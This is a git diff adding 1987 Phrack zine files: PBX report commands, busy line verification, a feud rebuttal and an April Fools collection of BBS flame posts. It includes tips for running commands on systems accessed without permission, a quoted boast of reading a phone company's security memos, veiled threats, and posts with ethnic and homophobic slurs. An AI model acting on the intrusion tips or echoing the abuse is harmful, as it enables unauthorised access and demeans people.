+    SUS : This suspends a command in the buffer.
+
+    ACT : This activates a command in the buffer.
+
+
+   Commands Explained:
+
+    Okay, so now we'll go through all of these commands and show you what they
+   do, and of course, explain each example.
+
+
+   LREP:
+
+    LREP lists a number of reports which can be ran. Here is an example:
+
+
+REP# NAME                SYNTAX
+---- ----                ------
+ 1 - CURRENT STATUS      ACD 1,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
+ 2 - CUMULATIVE STATUS   ACD 2,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
+ 3 - TRUNK DISPLAY GROUP ACD 3,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
+ 4 - POSITON PERFORMANCE ACD 4,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
+ 5 - ABBREVIATED AGENT   ACD 5,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
+ 6 - DAILY PROFILE       ACD 6,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
+ 7 - CUMULATIVE AGENT    ACD 7,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
+
+
+   Current Status   : Gives you the current status of the PBX system.
+   Cumulative Status: Quite obvious.
+   Trunk Display Grp: Obvious again.
+   Position Prfrmnce: ???
+   Abbreviated Agent: ???
+   Daily Profile    : Gives you a report of how the PBX ran on date 00/00/00.
+   Cumulative Agent : ???
+
+
+   ACD:
+
+    I purposely skipped all the other commands, since they are pretty obvious.
+   They all have to do with adding commands to the buffer, modifying them and
+   running them..etc. If you get access to a system, it would be wise to LST
+   all of the commands that the operators have been running and then try them
+   yourself. No biggy, but oh well. The ACD command activates a command and
+   lists the desired report on your terminal. While the whole thing can be
+   typed on one line, you can just type ACD <REPORT NUMBER> <CR> and do it
+   step by step (a little easier to get the hang of it). Now we'll go through
+   this, and show you an example of building a command to list the Trunk
+   Display Report.
+
+
+?ACD 3
+<CTRL-G>FIRST GP OR AGENT ID: (Try 1)
+<CTRL-G>LAST GP OR AGENT ID: (Try 2)
+START TIME: (Enter START TIME in army time such as 22:52:00)
+INTERVAL: (Not sure, hit return)
+# OF INTERVALS: (Not sure, hit return)
+CLEAR(Y/N): (Type Y, but this is stored in the last cleared log)
+REPEAT DAILY?: (No!)
+PRINT LAST CLEARED(Y/N): (Here's where the last cleared shows up)
+
+    It then prints out the command and executes it, showing you the desired
+   report.
+
+
+   The end result:
+
+    Some other things can be done, such as commands like C and M and a host
+   of others, but unfortunately, as I said, these systems are very strange
+   and it's hard to find two alike.  The computer is not worthless, and
+   lots of things can be done on it, but this file is getting quite lengthy.
+   If there is enough demand, I will write a follow-up.  In the meantime, if I
+   have made any mistakes, or you have more knowledge that you would like to
+   share with me, I can be reached on the following boards:
+
+    ShadowSpawn Private, Hell Phrozen Over, Phantasie Realm and a few others.
+
+                      -/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
+                      \                                   /
+                      /      An Evil Jay/Phrack, Inc.     \
+                      \                                   /
+                      /            Presentation           \
+                      \                                   /
+                      -/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
diff --git a/phrack12/8.txt b/phrack12/8.txt
new file mode 100644
index 0000000..77b4667
--- /dev/null
+++ b/phrack12/8.txt
@@ -0,0 +1,180 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 12, Phile #8 of 11
+
+                        BUSY LINE VERIFICATION PART II
+
+                         WRITTEN BY PHANTOM PHREAKER
+
+
+    This file is meant to be an addition to the first file that was included
+in Phrack Inc. Issue XI. It is assumed that the reader has read and understood
+the previous file.  Most of this information will be taken from Bell System
+Publications so you don't have to worry about it being incorrect.
+
+    First off, I'd like to correct a minor error included in the first file. I
+use the format 'KP+0XX+PRE+SUFF+ST' to show the MF routing that is used. This
+is not correct AT&T syntax though, the correct format is KP+0XX+NXX+XXXX+ST.
+This is minor detail, but some people are very picky.
+
+The Verification Network
+------------------------
+
+    In a TSPS office, a verification circuit is associated with a 4-wire
+OutGoing Trunk (OGT) and a 3-way/4-wire bridging repeater arrangement. This is
+the circuit that does the speech scrambling. The speech and other tones (like
+busy and re-order) are frequency shifted, but are still recognizable by a TSPS
+operator.
+
+    TSPS verification trunks are connected via dedicated lines to incoming
+verification trunks in a toll office. The toll office provides either a link
+to an outgoing trunk and dedicated facilities to another toll office, or an
+outgoing toll connecting trunk and dedicated facilities to an incoming
+verification trunk in a local office. Each toll office has ways to check the
+security of verification trunks. In electronic toll offices (ESS offices), two
+independent office data translations provide security of the trunk. Electro-
+mechanical toll offices (Such as a CrossBar Tandem (XBT)) use an electrical
+cross-office check signal or a segregated switching train to control trunk
+connections. Verification trunks relay supervisory signals (such as answering
+supervision) to TSPS from the line being verified. Also, if verification
+trunks are busy, the TSPS operator will receive a re-order.
+
+The functions of the VFY key
+----------------------------
+
+    When the operator presses the VFY key, several checks are made upon the
+number that has been entered. These are:
+    A Check to see if the line is within the verification network accessible
+by that particular TSPS. If the line is not, the VFY key will flash.
+
+    A check to see if the owner of the line wishes BLV to be possible or not.
+If the line is something like a police emergency line, then the VFY key will
+flash, similar to the first check.
+
+Important TSPS keys
+-------------------
+
+    When the VFY lamp lights steady (doesn't flash), indicating the process is
+acceptable, the operator puts the calling customer on hold and accesses an
+idle loop on the operator position. The ACS (Access) lamp lights steady if a
+verification trunk is available at that time. Then, the operator presses the
+ST key which sends out the complete number to be verified, in MF. The
+verification circuit activates, and the operator listens for scrambled speech
+and also watches the CLD (Called) lamp on her console. The CLD lamp is lighted
+when the operator loop was accessed, and will remain lit if the line being
+verified is on-hook. The operator has two ways of seeing if the line is in
+use, by listening, and by watching the CLD lamp. If the CLD lamp light goes
+out, then the line is off-hook.
+
+    If a successful BLV/EMER INT is performed, the operator presses the REC
+MSG MSG (Record Message) key, which completes the verification. If the EMER
+INT lamp is lit, the charges for the interrupt and the verification are
+automatically billed. If the VFY key is pressed twice, it indicates the
+verification should not be billed. This could be due to a customer error or a
+customer disconnect.
+
+Charging capabilities
+---------------------
+
+    A customer can pay for a BLV/EMER INT in several ways. They can have the
+charges put on their phone bill, if they are calling from their home, they can
+bill the charges to an AT&T Calling Card, or pay directly from a coinphone.
+Details of the BLV/EMER INT function are recorded on AMA tape, which is later
+processed at the RAO (Revenue Accounting Office).
+
+    The classes of charge are as follows: STATION PAID, which means exactly
+what it says, STATION SPECIAL CALLING, in cases where billing is handled by a
+Calling Card or third number billing, and NO AMA, in unusual billing cases.
+
+    Also, for BLV/EMER INT calls that originate from a hotel, TSPS can send
+charges to HOBIS (Hotel Billing Information System), HOBIC (Hotel Billing
+Information Center), or a TTY at the hotel.
+
+    AMA records for BLV/EMER INT are recorded in basically the same format
+that normal calls are recorded. The only difference is that a numeric data
+group is added. The leftmost digit in the data group is a 1 if only a BLV was
+done, but it is a 2 if both a BLV and an EMER INT were done. In case of an
+aborted BLV, the billing record is marked 'No charge'.
+
+Inward Operator differences
+---------------------------
+
+    When an Inward operator does BLV/EMER INT, the class of charge is always
+NO AMA, because billing is handled at the local TSPS site. Inwards also do not
+use the REC MSG key when a TSPS would, they use the VFY key in it's place.
+
+The Speech scrambling technique
+-------------------------------
+
+    The speech scrambling technique that exists to keep the customers privacy
+intact is located in the TSPS console, and not in the verification trunks. The
+scrambling technique can only be deactivated by an operator pressing the EMER
+INT key, or a craftsperson using the console in a special mode. When the
+scrambler is deactivated by an operator doing an EMER INT, the customer hears
+an alerting tone (as mentioned in the first BLV file) made up of a 440Hz tone.
+This tone is initially played for two seconds, and then once every ten seconds
+afterwards until the operator presses her Position Release (POS RLS) key.
+
+Operator trouble reporting
+--------------------------
+
+    When operators have trouble in handling a call, they can enter trouble
+reports that are technically called 'Operator keyed trouble reports'. These
+cause messages to be printed on the maintenance TTY and on the trouble report
+TTY channel. There are different trouble codes for different things, such as
+trouble with the speech scrambler, trouble in the verification network, or
+trouble in collecting charges from a customer.
+
+    In my area there are 20 such TSPS trouble codes. These are done in MF.
+They are entered with the KP TRBL (Key Pulse Trouble) key followed by a two
+digit trouble code followed by an ST. A trouble code for beeper trouble could
+be entered as KP TRBL+62+ST, and speech scrambler trouble could be KP
+TRBL+89+ST. Some of the other reasons for trouble codes are: Crosstalk, No
+ring, Noisy, can't hear, improper supervision toward the called and calling
+parties, cutoff, positions crossed, coin collecting trouble, third re-order,
+distant operator no answer, echo, data transmission, no answer supervision, ST
+key lit for more than 4 seconds, and others for person-to-person and
+station-to-station completed collect calls.
+
+Maintenance and traffic measurements
+------------------------------------
+
+    These reports can be output from a maintenance or engineering and service
+data TTY, daily or hourly. Each daily report contains data for the previous
+day. Some traffic counts are as follows:
+    Total Verification attempts, VFY key depressions, VFY key depressions when
+the requested number is out of TSPS range, VFY key depressions in which the
+requested number wasn't verifiable, BLV trunk seizures which pass an
+operational test, and EMER INT attempts. Other traffic counts include the
+measurements for usage of BLV trunks, the amount of time BLV trunks were
+unavailable, and the number of times BLV trunks were seized.
+
+
+    I hope this file has helped people further understand how the BLV system
+works. If you haven't read part I, get a copy of Phrack Inc. Issue XI and read
+file #10.
+
+    As said earlier, most of this information comes directly from Bell System
+Publications and so it should be viewed as correct. However, if you do find
+any errors then please try to let me know about them so they can be corrected.
+
+Suggested reading
+-----------------
+
+TSPS Part I: The console-Written by The Marauder, LOD/H Technical Journal
+Issue No. 1, file #4
+
+Busy Line Verification-Phrack Issue XI, file #10
+
+Busy Verification Conference Circuit-Written by 414 Wizard
+
+Verification-TAP issue 88, Written by Fred Steinbeck
+
+Acknowledgements
+----------------
+Bell System Technical Journal, Vol. 59, No 8.
+Bell Labs RECORD periodical
+
+And the following people for contributing information in some form:
+
+Mark Tabas, Doom Prophet, The Marauder
diff --git a/phrack12/9.txt b/phrack12/9.txt
new file mode 100644
index 0000000..8064ea5
--- /dev/null
+++ b/phrack12/9.txt
@@ -0,0 +1,240 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 12, Phile #9 of 11
+
+Rebuttal to Phrack Issue 8 and 11 (File 11)
+Written by Scan Man.....
+
+It has been requested of Taran King (Who doesn't agree with KL on this subj)
+to put this somewhere in the next issue of Phrack (12) for proper
+distribution. Whether he does or not I cannot say.
+
+
+     Well a number of months have gone by now and I have been written about
+accused of and had rebuttals written for me, all of which were about as clear
+and factual as mud. And that includes the rebuttal that Telecomputist has in
+effect tried to stand with me, and making matters only worse by inaccurate
+information. But then all of this started with inaccurate information from
+PWN, didn't it. KL has resorted to interfering in other peoples lives in order
+to promote his so called news publication. To this I say, if you are going to
+call it news then make it facts. I can buy the Enquirer if I want sensational-
+istic readership boosting and inflated gossip. You do no justice to yourself
+or your publication. I really shouldn't dignify any of this with comment but
+shall as the entire matter has been blown so far out of proportion and since I
+have been phreaking since these kiddies were still messing their diapers I
+feel it a little more than an inconvenience, particularly since these
+gentlemen (and I use the term loosely) can't seem to accomplish anything but
+guesswork and conjecture and have cost me (and my wife and son) a $50,000 job
+so the least I can do is get a few FACTS out.
+
+First, I was (and I stress was) employed by a company called Telecom
+Management Corporation. Notice the initials of this company (TMC). Telecom
+Mgnt is a management company, and a management company manages other
+companies. Among the companies it manages are 6 TMC Long Distance markets
+(none of which are in Vegas), two of which are in Charleston where I live and
+NY where I worked (up until two snotty nose teenagers (KL & SR) decided to
+stick there nose where didn't belong). At any rate I was hired and paid by
+Miami, lived in Charleston, and worked in NY. And yes with regard to your "he
+must have been quite an asset to them," I was an asset to them. And KL you
+seem to think it was surprising that they flew me to NY every week. I don't,
+and I'm sure the other 100 businessmen on my flights who I traveled with
+regularly would be surprised that they carried the unique distinction of being
+somehow in the wrong for having their companies send them to NY every week.
+I'll have to tell them this one for a good laff next time I get a 50,000
+dollar a yr job that sends me to NY. Moving right along, I will add that I was
+employed as a Systems Analyst. When I was originally hired, my interview was
+by a fellow from Miami (Telecom Mgnt) and the interview was conducted in the
+Chas office (one of the few times I was ever in there). This however doesn't
+explain why Pauline Frazier and Ben Graves knew me or didn't care for me. The
+reason for this was quite simple: they both knew about me and the bulletin
+board and had also been trying to catch me stealing calls from there company
+(don't know where they ever got that idea <grin>). At any rate they obviously
+were quite unhappy because I got that job.
+
+The next comment in rebut to Telecomputist which was a rebut to PWN Phrack
+Issue 8 (what a nightmare), was, and I quote, "I claimed not to have any ties
+with Vegas but didn't claim not to have ties with TMC." Boy talk about factual
+journalism, really grabbing for straws aren't you. Anything to make me look
+bad huh? Wonder why. Wouldn't be for more copies for your next issue would it?
+As you could see at the beginning of this rebuttal I clearly stated that
+Telecom Management ran 6 TMC markets as well as other companies and that they
+were connected but separate from each other. Although none of it is relevant
+to any of this, but that doesn't matter when you are out to get copies for
+your next issue does it KL. At any rate this also shows where Telecomputist,
+although trying to do a good thing, got their facts mixed up too by
+misunderstanding the fact that Telecom Managements initials were the same as
+TMC and were unrelated companies when actually they are.
+
+In you next comments you say, "The rest of my statements are highly debatable"
+(might try looking at a few (no make that all) of your own). You also said
+that my statements have no proof (as if yours are so damn factual). First, I
+don't have to prove a thing to assholes like you or anyone else for that
+matter. You also state your decision (as if you have the right to make any
+decisions about me, (shit boy you don't even know me, but you may soon) was to
+do nothing because of lack of proof. And you call what you came up with truth?
+Based on what, your vast personal knowledge of me, your knowledge of something
+some phone phreak told you, because of having worked with me? As for providing
+more ammunition to the idea, I'm not what I claim to be. I have claimed to be
+nothing, it's you doing all the claiming. And there is no "ammunition" to be
+had from the Telecomputist article as it was about as accurate as yours have
+been. Shows you what two people who know nothing about nothing can do if they
+put their minds to it. I might add that this is the first and last statement I
+have personally written that has anything to do with any of this. You also
+stated that, "after three months you had proof," yet you have shown only
+words, not a speck of proof or truth. You have taken the Telecomputist article
+apart and tried every way there was to tear it apart, most of which was
+guesswork and innuendo. Examples of this are your quotes of, "Gee isn't that
+awful expensive," "Notice how he didn't say he had no ties with TMC,"
+"Statements were highly debatable," "Now that he has had a few months to come
+up with a story," etc., that's some real facts there KL, you're a real
+journalist who deals only with facts. You're not out for gossip or character
+assassination. Riiiiiight. I've just been waiting for you to put your foot in
+your mouth (in this case both feet). (Don't worry, I'm sure they will fit
+nicely)
+
+I think it's also time to tell the story of how all this got started. It's
+really a comedy of errors (only I'm not laffing). As I stated earlier I was
+paid by Miami, as that's where the home office was. This meant that on
+occasion I also went to Miami as well as NY. In Dec of 85 I learned of a new
+organization being formed called the CFCA (Communications Fraud Control
+Association) although in addition to communications, they support computer and
+credit security as well. Knowing that all the top security people were going
+to be there and being a good phone phreak on the eternal quest for inside
+knowledge, I wanted in on this conference which was held the 6th, 7th and 8th
+of Feb 86 in Miami. Soooooo I convinced Telecom that we should check these
+People out for some benefit to our company with regard to my job (Systems
+Analyst) as after all it was my job to not only develop and operate the
+companies' computers but keep them secure as well. So I had had the perfect
+excuse to get me in the conference. They agreed with me and went for it and
+paid for my flight down there and the conference fee. Moving right along, it
+was the 1st day into the conference when just at lunch I was talking to a guy
+from Pac NW Bell named Larry Algard (whose name I had forgotten til Sally Ride
+showed up on the BBS saying Larry the Algardian had sent me a couple of weeks
+later). At any rate while talking to this guy, a security agent from one of
+the other LD companies that was there came up and said, "Aren't you Scan Man,
+the guy that runs P-80?" Needless to say I about shit, and had to come up with
+a damn good answer in about a 100th of a second. Knowing I was there legally
+with the authority of my company, I answered back (in front of Larry Algard),
+"Yes, but unbeknownst to my members it's an undercover board for TMC the
+company I work for." And since Telecom Management Corporations initials were
+TMC and they did manage 6 TMC LD companies I knew I was safe if he decided to
+check me out, which I was worried about because earlier this same guy (the one
+that said, "Aren't you Scan Man") had made a comment about the security of the
+meeting and that he believed hackers had infiltrated the meeting. At any rate,
+I was out of the fire with this guy and everyone (about 7 others) standing
+around in our circle. It does however get worse. Two weeks later I got a new
+user on the board named Sally Ride saying, "Larry The Algardian sent me" and
+the msg subj was titled Scott Higginbotham.  I answered the msg asking him
+where he got that name (Scott Higginbotham, my real name) but he thought I
+meant where did he get the name Larry the Algardian (see msg reprint below).
+His reply is as follows (actual copy of msg)
+
+Scan Man, I got the name from an electronic memo from Sec. Mgr. Larry Algard
+to his boss, George Reay. Since I've access to these files via PNB's UNIX AOS,
+I read about Algard's meeting with Scott at a CFCA Conf. in Miami. It's nice
+to be able to know what the other side is up to, but how did you infiltrate
+CFCA? I was able to infiltrate PNB Sec. thru their own system. But, to attend
+such a meeting of the toll carriers of the nation and learn their plans to
+combat us is a real coup!  Understand where I'm coming from?
+Sally Ride:::Space Cadet
+
+Now from this msg you can see two things: first that Sally Ride is a two faced
+little S.O.B., plus you can also see why he would think I was fed. I can
+almost (again I stress almost) understand why he was suspicious. This msg also
+points out that at least in his msgs to me he was of the opinion that I had
+infiltrated the conference (not that his opinion about anything matters).
+Then, on a social ladder climbing binge, he turns it around to me being one of
+them (as if he was the only person in the world who could infiltrate
+something). To this I say again, I was doing this when you were still in
+diapers (SR). Even though I can legitimately understand why he would think I
+was a fed as this at least "APPEARS" to be proof that I'm a fed, by that I
+mean if I had broken into a telco security computer and found a msg saying
+that so and so was running a sting board, I would be prone to believe it
+myself. What Sally didn't know was that I had to say that at that conference
+to keep from being fried myself when confronted by a security agent who
+recognized me. But then what are the odds of someone breaking into the very
+computer reading that very msg. If it were me and I was going to take this
+information to the phreak community I would have to state the facts, which
+were that he found this msg, "then print msg". I would not go into the
+guessing that he and KL did in the original Phrack article (or this last one,
+since the first obviously wasn't enough). But back to the point of all of
+this, "WHAT WOULD YOU SAY STANDING IN THE MIDDLE OF 500 TOP TELCO SECURITY
+PEOPLE AND ONE WALKS UP AND SAYS, "AREN'T YOU SO AND SO THAT RUNS SO AND SO
+BBS?"  See what I meant about a comedy of errors? Do you also see why
+sometimes what is apparently the truth isn't always what it appears as. Do you
+also see what I mean about gossip and poor journalism? This is not the first
+time that Sally  or KL has tried to distort facts and interfere with people's
+lives. I am referring to the past David Lightman incident. Instead of
+belaboring this point, I shall, in the fashion of the great journalists (KL &
+SR), reprint another msg from Sally regarding this other incident in order to
+show what kind of individual we are dealing with (a 19 yr old who if he spent
+as much time hacking and phreaking as he does stretching the facts and butting
+into peoples lives might be a good phreak/hack).
+
+From: Sally Ride
+
+Well a couple of things..first about Phrack World News..the above mentioned
+article about Blade Runner and David Lightman was credited to David Lightman
+and Blade Runner and someone else, maybe K.L. I really don't know either David
+or Blade that well, but when someone is accused of being a cop, or a phone
+cop, or whatever, I see no reason to keep that a secret from the phreak-world.
+Everyone is able to make their own conclusions based on the information
+provided and considering the sources. Finally, and I hope this ends all
+discussion about this on the "Elite" section of this BBS. Is that what is
+allowed for discussion here? Really, character assassination should be kept to
+the War Room of some other K-Rad luzer BBS. Secondly, thanks to all who kept
+me up to date on the status of the BBSes that had suddenly dropped out of
+sight all for separate unrelated reasons. I found The Twilight Zone, now the
+Septic Tank, it's back at 203-572-0015, old accounts intact. Taran King's
+Metal Shop Private should be back up within hours of this message, see PWN 6
+for the details. And Stronghold East is still down as far as I know, should be
+back around 7/1. Broadway's always been weird but turning informant? Will
+wonders never cease? And, TUC has a board again? And, here I thought he was a
+"Security Consultant", per W.57th St. Who knows who's side who is on?  Scan
+Man, here's news from your neck of the woods. A company named Advanced
+Information Management Inc. run by Robert Campbell. The June 23rd issue of
+Communications Week says this guy and his 17 consultants are all over the BBS
+world. They are based in Woodbridge, VA. Know anything about them? Sound like
+some more narcs to worry about.  What is the true story on Ralph Meola? PWN 6
+says he's the head of AT&T Security.  Has anyone ever heard of him before?
+Sally Ride:::Space Cadet
+
+I believe your words were, "character assassinations should be kept on some
+k-rad Luzer war board" (try taking some of your own advice, or is it different
+when it's your friend). You also made the statement that everyone should be
+able to make their own decisions based on the sources. In my case it's two
+guys that don't know me or really anything about me (KL & SR). Did anyone also
+notice Sally's tendency toward a persecution complex? Everyone he mentioned in
+the msg is thought to be a phone cop. I mean, really, take a good look at that
+msg. It's quite obvious this boy is playing God and deciding who is and isn't
+on who's side (you're not the only one who saves msgs). He's either attacked
+or defended (mostly attacked or insinuated) about 5 people in one msg of being
+the bad ole phone cop. Who set you two up as judge and jury? As to how I feel
+about it, I'll use an old saying with a new twist, "If you want to hear the
+jukebox, you damn well better have a quarter," better known as "pay the
+piper". Does it sound like I'm upset? I mean how would you feel if you had
+trouble keeping your family fed, heated, and housed because some asshole that
+just hit puberty stuck their nose into your life. Tell your son, no he can't
+go skating because you don't have the money because........etc.....Also I
+might add that a number of us old guards who were phreaking before there were
+computers and BBSes such as my old friend, Joe Engressia (Secrets of Little
+Blue Box, Esquire 71) (avail P-80) and others have done actual security work
+(not busting heads) defeating security systems on new payphones (test before
+marketing) etc for yrs. I don't see anyone jumping up and yelling phone cop on
+these guys. People who are admitted security people who also claim to be
+phreaks are ignored. So why all the stink with me? In closing I would like to
+say that I have little doubt that in their usual fashion KL and/or SR will
+attempt to go over every word I have typed looking for more SO CALLED FACTS.
+Any way you try to reword it will only be more twisting and supposition.  Sooo
+be my guest. You will get no more comments from me. The next time either of
+you two hear from me, you better have your Quarter for the jukebox cause it
+will be time to pay the piper.
+
+P.S. KL do me a favor and call my board and let me know whether you will be at
+this phreak conf in St Louis. If so I recommend old cloths, and clean
+underwear.
+
+
+(Oh yes and a quarter.)
+
+Scan Man (3-10-87)
diff --git a/phrack13/1.txt b/phrack13/1.txt
new file mode 100644
index 0000000..901c603
--- /dev/null
+++ b/phrack13/1.txt
@@ -0,0 +1,40 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 13, Phile #1 of 10
+
+                                   Index...
+                                   ~~~~~~~~
+
+         Well, as a tribute to April Fools Day (4/1/87) and as a break to the
+normal grinding speed of Phrack Inc. (HA!), we at Phrack Inc. have taken a
+break to be stupid, to get our frustrations out, to make fun of people,
+places, and things, and to be just generally obnoxious.
+
+         This issue was delayed due to THE EXECUTIONER who may be blamed for
+the slow date release of this issue.  We currently believe him to be trekking
+back to his home in the Himalayas to hide with his mom (Saskwatch).  Heh...
+Just getting you in the mood for what's ahead.
+
+         This issue is NOT to be taken seriously in any manner (except
+anything mentioned about Oryan Quest) and is put together extremely loosely.
+None of the files have been formatted.  None of the files have been spell-
+checked.  Don't expect quality from this issue...just have fun.  Later.
+
+                                                      Taran King
+                                             Sysop of Metal Shop Private
+
+------------------------------------------------------------------------------
+
+Table of Contents:
+
+#1  Phrack XIII Index by Taran King (2.0K)
+#2  Real Phreaker's Guide Vol. 2 by Taran King and Knight Lightning (5.2K)
+#3  How to Fuck Up the World - A Parody by Thomas Covenant (9.5K)
+#4  How to Build a Paisley Box by Thomas Covenant and Double Helix (4.5K)
+#5  Phreaks In Verse by Sir Francis Drake (3.1K)
+#6  R.A.G. - Rodents Are Gay by Evil Jay (5.8K)
+#7  Are You A Phone Geek?  by Doom Prophet (8.8K)
+#8  Computerists Underground News Tabloid - CUNT by Crimson Death (10.5K)
+#9  RAGS - The Best of Sexy Exy (19.2K)
+#10 Phrack World News XIII by Knight Lightning (26.0 K)
+------------------------------------------------------------------------------
diff --git a/phrack13/10.txt b/phrack13/10.txt
new file mode 100644
index 0000000..66ca093
--- /dev/null
+++ b/phrack13/10.txt
@@ -0,0 +1,579 @@
+                               ==Phrack Inc.==
+
+                    Volume Two, Issue 13, Phile #10 of 10
+
+                PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+                PWN                                         PWN
+                PWN      *>=-{ Phrack World News }-=<*      PWN
+                PWN            ~~~~~~ ~~~~~ ~~~~            PWN
+                PWN               Issue XIII                PWN
+                PWN                                         PWN
+                PWN      Created, Written, and Edited       PWN
+                PWN           by Knight Lightning           PWN
+                PWN                                         PWN
+                PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Happy April Fool's Day and welcome to Issue Thirteen of Phrack World News.  In
+the spirit of April Fool's Day, this is the "rag" issue of PWN.  And now we
+take a look back and enjoy the most hilarious posts of the past year.  These
+posts were selected only because they were there and no one should take offense
+at the material.  Please note that not all posts are rags, which only goes to
+prove that you don't have to rag to be funny.
+
+     [Some posts have been reformatted and edited for this presentation].
+
+                        [Special thanks to Solid State]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Name: The Executioner #47
+Date: 2:33 pm  Fri Sep 12, 1986
+
+Slave Driver > Do explain that message... I do NOT kiss anyone's ass except my
+own because I am such an awesome studly dude.  Something you would know nothing
+about, being studly that is.
+
+Master Vax, you are an utter bore who has nothing contributing to say.  You are
+so useless.  When people say "Sexy-Exy", they say "Ragger Elite, good knowledge
+and not too bad of a cosysop."  When people say Circuit Breaker, they say
+"who?????" . Face it, you are basically non-existent in the modem world. You
+command nothing and you hang out with the lowest echelon like Dr. Doom who sat
+there for about 10 minutes taking my abuse, making lame comments thinking he
+was cool.
+
+Anyway, this is a phreak/hack sub, not some rag board where I am allowed to
+bug the hel out of you. And when it comes right down to it, I don't brag about
+my knowledge, because "Those who proclaim their knowledge, proclaim their
+ignorance".
+
+                               -The Sexyest Executioner
+
+
+Name: Dr. Doom #106
+Date: 6:04 pm  Fri Sep 12, 1986
+
+Executioner...
+  Well, it seems that a little more than a week ago, it was 'Dr. Doom, we (PLP)
+feel that you would be a valuable addition to our group and therefore are
+extending an invitation to join the Phone Line Phantoms.' and then I told you
+quite simply that I wasn't interested in joining PLR (Phone Line Raggers). NOW,
+you are calling me voice just to rag on me and posting 'Dr. Doom the loser...'.
+So, the other week you were kissing ass 'Dr. Doom join PLP....' , etc... and
+now quite suddenly I have become a loser because I didn't join PLR.
+
+Guy, I could in a few minutes come up with LOADS of stuph to say about you, but
+since you carry no weight and are on some kind of an ego-trip I will let you go
+off to Central Park and play Ninja with Broadway.
+
+Dr. Doom
+
+
+Name: Knight Lightning #2
+Date: 12:49 am  Sat Sep 13, 1986
+
+This is getdhng good, its been a while since we saw a really heated battle on
+here and you know why?  Because those who start heated battles on this board
+get deleted so either post good info or use the email or you won't be using
+the system for anything any longer.   In other words lets drop the bullshit
+messages (like this one) use use this sub for what it was intended.
+
+:Knight Lightning
+
+
+Name: The Executioner #47
+Date: 9:45 am  Sat Sep 13, 1986
+
+By the way, Dr. Doom, we thought you had some knowledge (at least TEL did).
+When I read all 31+ files you wrote, which happened to come straight out of
+manuals, I was not impressed. I am not ragging on you because you didn't join,
+I am pointing out a harsh reality that you should face.
+
+You are a peon compared to the monolithic stature of one such as I.
+You are an amoeba compared to the complex genius person I am.
+You are a pimple compared to the sexyness and looks such as I.
+You are a clinging form of pig feces.
+
+You throw absolutely NO weight around. No one cares about you or your bbs.
+having absolutely no reputation, you proceed to write 31 files because you cry
+at home fearing that no one likes you. And, I have composed a neat little tune
+about you to the Beverly Hillbillies (Your ancestors)
+
+          Now listen to a story about a boy named Doom,
+          Poor Modem geek who would never leave his room.
+          Then one day he was talking on the phone,
+          When up in his pants came a miniature bone.
+          Penis that is, kind of like a toothpick.
+          Well the next thing you know old Doom has a board,
+          Running on a commie cuz it's all he can afford.
+          So now doom sits at home as happy as can be,
+          thinking he's cool he turns down PLP.
+          So now he thinks he happnin he thinks he's rad,
+          With his high pitched voice, god this boy is sad.
+          And this is the story about a dork named Doom,
+          Poor modem geek who DOESN'T want to leave his room.
+          Why?
+          Because your UGLY! D-O-O-M! (<-that was to Mickey Mouse)
+
+                             The End.
+
+                           The Executioner/PhoneLine Phantoms!
+Name: Carrier Culprit #11
+Date: 10:17 am  Sat Sep 13, 1986
+
+Heh. That was pretty cool.  Doom you have no talent what so ever, I could pick
+up a manual and start typing away.  When data demon and I were talking to you
+via 3 way you couldn't even answer some basic CCIS stuff.  And Lover was the
+only person who wanted you in the group, I hope he wasn't impressed by your
+files (volume I, II, III, IV, V, etc.. heh).  And if you think that all PLP
+does is rag, well you must not know what's up in the world.  And make up your
+mind, you keep changing your group's name and bragging about turning down an
+offer to be in PLP.  Well, Doom my boy you told me your were going to drop
+Metro Communications to join PLP until you saw Exy's rag on your so called
+Commie 5 messages per sub board.  Shit your board was up longer than Link, and
+Link blows it away.  Well, I really should stop this ragging because it's
+pretty uncool, then again Doom is uncool.  Anyway your group is gay in the
+face!
+
+--Culprit
+MCI Communications
+Sprint COM
+950 Communications
+I dunno Communications
+Metro MEN!
+
+
+Name: Dr. Doom #106
+Date: 10:04 pm  Sat Sep 13, 1986
+
+Well, as some of you might have seen lately, certain people do not relish the
+fact that I thought very little of them so they are attempting to slander my
+good name by saying that I know nothing and that every file I have ever written
+was copied from manuals.  First of all, most files I have written do contain
+some information that was origionally printed on some Bell or AT&T document,
+because they relate to such things as ISDN, but by NO means are they copied
+from manuals in any way.
+
+Mikie, that was a rather amusing song, but in no way did anything in it come
+close to possibly reflecting me.  I mean it is nice that you want to tell
+everybody about your life and all, but you really should not try to
+self-project your tragedies on someone else.  If you need help trying to come
+up with some auto-biographical titles about yourself, you should try :
+
+     'The Life and Times of a PLP Loser Named Mikie Chow Ding Dong Dung.'
+
+Oh, did you call me UGLY?  that is quite far from the truth.  Look at you,
+someone who as a child could use dental floss as a blindfold.  calling me UGLY?
+Humor me more Mr. 'UGLY' Chinaman who writes files on 'Beauty Techniques'.
+Face it, some people are just born naturally handsome and don't need make up to
+disquise their grotesque features like you do.
+
+Since you think you are SO tough, you are cordially invited to come down here
+to Texas where talk is cheap and doesn't mean shit.  (Don't forget to bring
+your throwing star collection....'
+
+Dr. Doom
+
+
+Name: The Executioner #47
+Date: 10:18 am  Sun Sep 14, 1986
+
+Doom, Spare me your lame tongue flapping and breath exhultation that only makes
+you look like the fuckoid you are.  People have met me, people know that what I
+say is all backed up and all true.  Who has met you? No one has met you so you
+can fling all the bullshit you want.  When I say I am gorgeous, the people who
+have met me can always say, "I've met you and you are a dork".  But do they?
+No, because I am not a dork unlike yourself.
+
+I don't know where you get the idea that I am some karate dude, because I am
+not, and don't even care to be.  Unless you are stereotyping all of us
